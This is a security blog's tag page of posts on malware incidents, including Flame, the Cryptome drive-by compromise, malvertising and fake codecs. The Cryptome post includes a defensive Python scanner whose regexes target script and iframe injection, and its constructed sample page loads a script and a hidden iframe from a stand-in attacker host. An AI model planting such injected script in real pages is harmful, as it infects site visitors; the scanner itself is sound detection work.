I can't believe that came from your mouth!
Posts tagged malware
Flame On! New Advanced Stuxnet-Type Worm Infects Middle East
May 29th
Who’s up for more Stuxnet-style cyber attacks against Persia? Me, that’s who.
From FoxNews here:
Computer malware described as “the most sophisticated cyber weapon yet unleashed” has been uncovered in computers in the Middle East and may have infected machines in Europe, according to reports from antivirus researchers and software makers in Russia, Hungary and Ireland.
The malware, dubbed Worm.Win32.Flame, is unusual in its complexity, size and the multitude of ways it has of harvesting information from an infected computer including keyboard, screen, microphone, storage devices, network, Wi-Fi, Bluetooth, USB and system processes.
The malware is called “Flame” by Kaspersky Labs, but also known as sKyWIper by the Hungarian Laboratory of Cryptography and System Security (CrySyS Lab). Both Kaspersky Labs and CrySyS Lab said it was likely the malware was developed by a government-sponsored entity.
Although the virus has just been detected, there was evidence that it may have been in operation for at least two years.
Vitaly Kamluk, chief malware expert for Kaspersky Labs, said there were many pointers to it being a weapon, not the least of which was how highly-targeted it was. According to their investigations, only 382 infections have been reported, 189 of which were in Iran, and the malware targeted individuals rather than organizations.
Kamluk said the malware was most likely introduced by a USB stick or other removable drive. Once injected, the malware would contact one of the many command and control servers around the world and download additional modules as needed.
Whee! I haven’t seen the code snippets, but McAfee’s blog lists its capabilities here.
Skywiper is a modular, extendable and updateable threat. It is capable of, but not limited to, the following key espionage functions:
- Scanning network resources
- Stealing information as specified
- Communicate to C&C Servers over SSH and HTTPS protocols
- Detect the presence of over 100 security products (AV, Anti-Spyware, FW, etc)
- Both kernel and user mode logic is used
- Complex internal functionality utilizing Windows APC calls and thread start manipulation, and code injections to key processes
- It loads as part of Winlogon.exe then injects to Explorer and Services
- Conceals its presence as ~ named temp files, just like Stuxnet and Duqu
- Capable of attacking new systems over USB Flash Memory and local network (slowly spreads)
- Creates screen captures
- Records voice conversations
- Runs on Windows XP, Windows Vista and Windows 7 systems
- Contains known exploits, such as the Print Spooler and lnk exploit found in Stuxnet
- Uses SQLite Database to store collected information
- Uses custom DB for attack modules (This is very unusual, but shows the modularity and extensibility of the malware)
- Often located on nearby systems: a local network for both C&C and target infection cases
- Utilizes PE encrypted resources
Like This Post? Rate it and tell your friends! Click the Share button below.
Cryptome.Org Hacked- Hosted Scripts for Drive-By Malware UPDATE! Javascript Captured
Feb 14th
Cryptome.Org was compromised by some type of PHP vulnerability, adding a download script to each of its pages on the webserver. The compromised pages produced the following AV alerts to visitors- click the photo to embiggen:
Cryptome confirmed each page had been modified here:
(13 Feb 2012) 5,000 more files found infected, still checking, but it looks as though every HTML file on Cryptome was infected. Sneaky: files inside directories and sub-directories were changed to add the SCRIPT with date of change but without changing the directory date. Not clear how access was gained through our ISP. Access logs do not show the infection activity. Any ideas how that was done and how to prevent recurrence: cryptome[at]earthlink.net
ArsTechnica goes on to report that Cryptome seems to think they were breached via the phpMyAdmin configuration page on their server.
A breach that caused Cryptome.org to infect visitors with virulent malware was one of at least six attacks reported to hit high-profile sites or services in the past few days. Others affected included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.
Cryptome, a repository of leaked documents and other information concerning free speech, privacy and cryptography, was attacked by hackers who left code on its servers that attempted to infect visitors using Windows PCs with a trojan spawned by the Blackhole Toolkit, the website reported on Sunday.
Cryptome founder John Young said in an e-mail that he believes the attackers were able to infect his website with a poisoned PHP file by exploiting a weakness in security or server software provided by Network Solutions, which hosts the Cryptome website.
If Cryptome was running a standard type of PHP-enabled blog, such an attack would be a bit easier- a PHP-based attack can compromise the MySQL database and the malcode could be easily injected onto each page. But Cryptome doesn’t use PHP. Perhaps they actually do have PHP, but only as an add-on available via their webserver administration console software.
The last time Cryptome was hacked, the name of Justin Perras came up- he was jailed for the Lexis Nexis hack back in the day.
Thanks to @AoSHQ Doom.
UPDATE!!
Coincidentally enough, I began to receive AV popups of my own related to the Blackhole malware. My AV of choice is the excellent Microsoft Security Essentials.
I examined the details and found out that one of the RSS feeds I track was prepending a malicious script to the RSS feed page that is served by Internet Explorer. I carved out the script and submitted it to Jsunpack. As is often the case, Jsunpack didn’t detect the decoded JavaScript as malicious, but reading through the eval commands, it is clear that the software attempts to insert an iframe and create a drive-by download. Below is the decoded JavaScript. Click the image to embiggen.
It is also worth noting that this threat employs dynamic DNS to prevent anyone from simply blackholing the IP address. And if the threat is widespread enough to begin to infect the RSS feeds of popular blogs, this one is going to be a big deal in the security sector in the next several weeks.
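Both indicators in this post, the SCRIPT tag added to every HTML file on Cryptome and the eval-wrapped iframe injector prepended to an RSS feed page, are the kind of thing a site owner can hunt for on their own web root. The scan below is an added example written for this page, not code from the post, Cryptome or Jsunpack; the hostnames, the burst threshold and the sample page are constructed.

```python
import os
import re
from collections import Counter
from urllib.parse import urlparse

# Injection patterns from the post: an externally sourced <script>, a hidden <iframe>,
# and inline JavaScript that hides its payload behind eval/fromCharCode/unescape.
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
IFRAME = re.compile(r'<iframe[^>]*>', re.I)
HIDDEN = re.compile(r'(?:width|height)\s*=\s*["\']?0*[01]\b|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
OBFUSCATED = re.compile(r'\beval\s*\(|String\.fromCharCode|\bunescape\s*\(', re.I)

def scan_html(text, allowed_hosts):
    """Return (kind, evidence) findings for one HTML page or feed document."""
    findings = []
    for src in SCRIPT_SRC.findall(text):
        host = (urlparse(src).hostname or "").lower()
        if host and host not in allowed_hosts:  # scripts served from our own hosts are expected
            findings.append(("external-script", src))
    for tag in IFRAME.findall(text):
        if HIDDEN.search(tag):  # 1x1 or invisible frames are the drive-by loader pattern
            findings.append(("hidden-iframe", tag))
    m = OBFUSCATED.search(text)
    if m:
        findings.append(("obfuscated-js", m.group(0)))
    return findings

def mass_modification_windows(mtimes, window=300, threshold=50):
    """Bucket file mtimes into window-second slots and return slots holding >= threshold files.
    A site-wide injection shows up as one burst of HTML edits even when access logs show nothing."""
    buckets = Counter(int(t) // window * window for t in mtimes)
    return sorted(slot for slot, n in buckets.items() if n >= threshold)

def scan_webroot(root, allowed_hosts):
    """Walk a web root; report per-file findings and any edit bursts (filesystem wrapper)."""
    report, mtimes = {}, []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".xml", ".rss")):
                path = os.path.join(dirpath, name)
                mtimes.append(os.stat(path).st_mtime)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_html(fh.read(), allowed_hosts)
                if findings:
                    report[path] = findings
    return report, mass_modification_windows(mtimes)
# Constructed sample page (not from the post): one legitimate local script plus injected content.
SAMPLE_PAGE = """<html><head><script src="/js/site.js"></script>
<script src="http://evil.example.invalid/x.php"></script></head><body>
<iframe src="http://evil.example.invalid/ld" width=1 height=1></iframe><script>eval(String.fromCharCode(100,111));</script></body></html>"""
```

Run `scan_webroot("/var/www/html", {"cryptome.org"})` against a copy of the site; a burst slot with thousands of files, as in the 5,000-file incident quoted above, is the timestamp to pivot on in whatever logs do exist.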
This is What Happens When You Refuse to Upgrade From XP
Dec 12th
Way too many of the customers I interact with are still stuck using Windows XP, an operating system that came out when the Twin Towers were still standing in New York. And even though they purchase 64-bit computers with large amounts of RAM, they don’t utilize that power, and stick with the 32-bit image they have standardized on for over a decade. They spend a huge fortune on defense in depth to protect what they know to be an inferior operating system, and much of that defensive procurement would be rendered unnecessary if they went with a hardened endpoint operating system.
Sticking with WinXP and IE7 is a powder keg of a disaster waiting to happen. Just take a look at an Atlanta Hospital that just risk-managed their way into having to do without their computer network which is maggoty with malware, botnets and virii. From the AJC here with thanks to RSA:
Ambulances turned away as computer virus infects Gwinnett Medical Center computers
Gwinnett Medical Center on Friday confirmed it has instructed ambulances to take patients to other area hospitals when possible after discovering a system-wide computer virus that slowed patient registration and other operations at its campuses in Lawrenceville and Duluth.
The health system has been forced to switch back to paperwork.
Patients were waiting longer at registration on Friday, and the virus also was affecting departments such as the pharmacy, radiology and labs. A system of runners is dealing with a variety of tasks, such as running orders down to the pharmacy or delivering X-rays to doctors.
A hospital taken down by malware and an overcautious risk management team.
How Ad Agencies Prevent Driveby Malware Ads
Aug 9th
One of the most effective ways to distribute malware to unsuspecting users is to poison the advertising banners used by some of the most popular websites on the Internet. The malware author’s ad would take advantage of local browser weaknesses to inject trojan software or otherwise compromise the system. If a malware author could get his malware to be delivered to everyone visiting Gawker for instance, it could represent thousands of compromised systems before anyone could react and remove the ad.

When malware authors first started using this methodology, many of the ad agencies had to learn the hard way that advertisers weren’t always who they claimed they were. Lots of background checks were put into place to prevent these criminals from placing bogus infected ads- credit checks, investigation into domain registration, business history, references- and still some bad guys kept breaking through.
Many ad agencies had their reputations thrashed because they unwittingly enabled the compromise of thousands of systems, so it was in their best interest to protect the cyber community by vetting their clients as well as they could.
This article here at MediaPost provides a great web advertising insider’s account of dealing with very clever malware authors who were creating shell companies specifically so they could get their ad banners on their ad network.
Safe Browsing Tips- How Safe Is That Website?
Sep 8th
I have spent lots of hours in the Analyst’s chair poring over IDS/proxy server/SIEM logs and alerts, and trying to piece together intrusions based on the scant evidence available. So any utility or tool that helps me understand the likelihood of a successful compromise of a victim host is helpful. For instance, if you have an alert that someone visited a website and encountered a possible malicious Shockwave Flash file or unusual JavaScript- how do you determine how likely the victim was to be compromised? Here are two great free tools that can help.

First up is SiteAdvisor, a site I have blogged about in the past.
SiteAdvisor was purchased by McAfee a few years ago, and is a great analytical tool to help determine how likely someone was to have been compromised by providing the ability to search for potentially malicious domains via its web interface. On the right-hand side of the SiteAdvisor homepage is a search box. Simply type in the name of the site, such as Belch.Com or your own domain, or the potentially malicious site in question and click on the view report now link. The primary site will appear in the center along with any links to potentially malicious sites. If malware is known to exist on the website, it lists what type of malware it was. For example, check out the report to iask.com here.
You get a report that looks like this, that shows the banking trojan download and the other sites that link to this page to retrieve malware. You can simply click on one of the linking sites to view the report from that site as well. If the victim host you are investigating had visited a site such as this, chances are much higher that the host could be compromised compared to someone visiting a “green” site.
Next up is Google’s Safe Browsing Diagnostic Tool.

This is not a utility that is available for general use through a Google homepage, but the tool is simple enough to use. Simply paste this URL into your browser and save it:
http://www.google.com/safebrowsing/diagnostic?site=iask.com
Now just change the value after the “site=” parameter to the site in question to see if the site is currently hosting malware or has hosted any in the past 90 days. You will notice in this example on this date that the iask site is not hosting any malware, and hasn’t for 90 days. But if you click on any of the AS links, you will see what that network has been known to host for 90 days, as well as sample known malicious sites. Give it a try for Belch.Com or for your own site.
Conficker, Schmonficker. Thumbdrive Worms and Rogue Antivirus Are Real Threats
May 11th
I haven’t written very much about the Conficker virus on this page except to note that it caused France to ground their fighter jets. I didn’t write about it because, despite the hype and the dreaded April First doomsday threat that never materialized, I just haven’t been seeing it play out very much in the field. Yes, the conficker virus was apparently written by an advanced malware author or more likely, a team of authors, but the threat is largely nullified by simply patching your Windows system. If anything, the fact that the threat was never bigger is a testament to how far Microsoft has come with managing their patch delivery to their customers.
But according to McAfee, the real threat out there is not Conficker. It’s people sticking their thumb drives everywhere and either getting infected or leaving an infection. As the chart above indicates, the contrast between the number of Conficker infections and thumb-drive “sneaker net” virus distribution is stark.
McAfee also notes that hackers are getting really good at gaming Google’s keyword searches to drive users to compromised hosts in order to install rogue antivirus software, which is actually malware. This information is from their quarterly threat report. You can read the whole report here.
Evolution of Malcode Criminals
Nov 21st
The guys who write viruses and malware aren’t the mischief makers of yore. The bad guys have figured out that the best way to get their malware removed from an infected system is to make the malware noisy- send out tons of spam, flood the network with packets, and make the host almost unusable for its owner. Within short order, the host is repaired, or flattened and reloaded. Now the bad guys are being quiet, infections are on the rise, and more and more criminals are making money from their malware. Mikko Hypponen from F-Secure has this outstanding video explaining how malware has evolved from trojan horse attachments in email to drive-by downloads that finance international terror.
F-Secure’s 2008 Security Overview
Jun 25th
Mikko Hypponen of F-Secure is in this video below describing some of the coolest threats discovered on the Internet in the first half of 2008. Much of it has been covered on this blog before regarding phishing attacks and malware backdoors. But one of his statements near the beginning caught me way off guard and was a bit shocking.
The unrest in China over Tibet has prompted some very targeted malware attacks against pro-Tibet groups. Since many of those humanitarian and human rights groups knew that their email communication was constantly being monitored by China, they had switched to encrypted email- specifically, PGP. Mikko tells a story about how some of the targeted malware attacks against the pro-Tibet groups were designed to steal the public and private PGP keyrings! Since the Chinese can’t crack PGP on their own, but assuredly have copies of the encrypted transmissions, they targeted and stole the PGP keys to decrypt the emails of the dissidents and human rights groups.
Wow.
Bhutto Assassination Video Trojan
Dec 28th
There are lots of websites out there taking advantage of the Bhutto Bombing to spread malware and trojan horse attacks. According to McAfee, some are posing as video codecs hosted on Blogspot sites.

From McAfee here:
Within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.
Claiming to be a New HD Codec, these malware authors attempt to social engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites are observed to be hosting this fake video.
Google should be able to do so much more to prevent their servers from hosting malware. It’s really easy to tie a search engine to a cross-reference database of known malware links or AV signatures. They don’t have to do it for all websites they index, but they certainly should do it for their own domain.
Content Filters for Security
Nov 7th
Kiltak at [GAS] Geeks Are Sexy has invited me to guest blog at his site! You can check out how to use content filtering for blocking malware over at that site here. Be sure to check it out!